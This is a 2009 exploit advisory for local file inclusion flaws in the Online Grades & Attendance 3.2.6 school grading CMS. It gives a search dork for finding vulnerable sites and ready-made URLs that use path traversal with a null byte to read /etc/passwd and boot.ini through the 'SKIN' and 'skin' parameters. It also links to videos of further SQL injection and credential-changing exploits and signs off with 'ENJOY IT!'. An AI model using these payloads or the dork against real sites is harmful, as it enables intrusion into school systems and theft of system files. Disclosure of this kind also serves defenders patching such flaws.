----------------------------------------------------------------------------------------------
| MULTIPLE LOCAL FILE INCLUSION VULNERABILITIES |
|--------------------------------------------------------------------------------------------|
| | Online Grades & Attendance v-3.2.6 | |
| CMS INFORMATION: ----------------------------------------- |
| |
|-->WEB: http://www.onlinegrades.org/ |
|-->DOWNLOAD: http://www.onlinegrades.org/ |
|-->DEMO: http://www.onlinegrades.org/demo_info |
|-->CATEGORY: CMS / Education |
|-->DESCRIPTION: Online Grades is based on the project, Basmati. It has all of the same |
| features plus many new features. OG is a web based grade... |
|-->RELEASED: 2009-02-05 |
| |
| CMS VULNERABILITY: |
| |
|-->TESTED ON: firefox 3 |
|-->DORK: "Powered by Online Grades" |
|-->CATEGORY: LOCAL FILE INCLUSION (LFI) |
|-->AFFECT VERSION: <= 3.2.6 |
|-->Discovered Bug date: 2009-05-21 |
|-->Reported Bug date: 2009-05-21 |
|-->Fixed bug date: Not fixed |
|-->Info patch: Not fixed |
|-->Author: YEnH4ckEr |
|-->mail: y3nh4ck3r[at]gmail[dot]com |
|-->WEB/BLOG: N/A |
|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. |
|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) |
----------------------------------------------------------------------------------------------
###########################
///////////////////////////
LOCAL FILE INCLUSION (LFI):
///////////////////////////
###########################
<<<<---------++++++++++++++ Condition: register global = ON +++++++++++++++++--------->>>>
[++] var --> 'SKIN'
~~~> http://[HOST]/[PATH]/?GLOBALS[SKIN]=../../../../../boot.ini%00
~~~> http://[HOST]/[PATH]/?GLOBALS[SKIN]=../../../etc/passwd%00
<<<<---------++++++++++++++ Condition: Be admin user +++++++++++++++++--------->>>>
[++] GET var --> 'skin'
~~~> http://[HOST]/[PATH]/admin/admin.php?skin=../../../../../boot.ini%00
~~~> http://[HOST]/[PATH]/admin/admin.php?skin=../../../etc/passwd%00
<<<-----------------------------EOF---------------------------------->>>ENJOY IT!
You can watch "Online Grades" exploits in action:
SQLi --> http://www.youtube.com/watch?v=PWYh5254I4c
Credentials Changer --> http://www.youtube.com/watch?v=BhHpLicPcC0
LFI/BSQLi --> http://www.youtube.com/watch?v=Mlpve19l6_o
LFI/BSQLi --> http://www.youtube.com/watch?v=6kt-NU98GXU
##**************************************************************************##
## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ##
##**************************************************************************##
##--------------------------------------------------------------------------##
##**************************************************************************##
## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!##
##**************************************************************************##
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum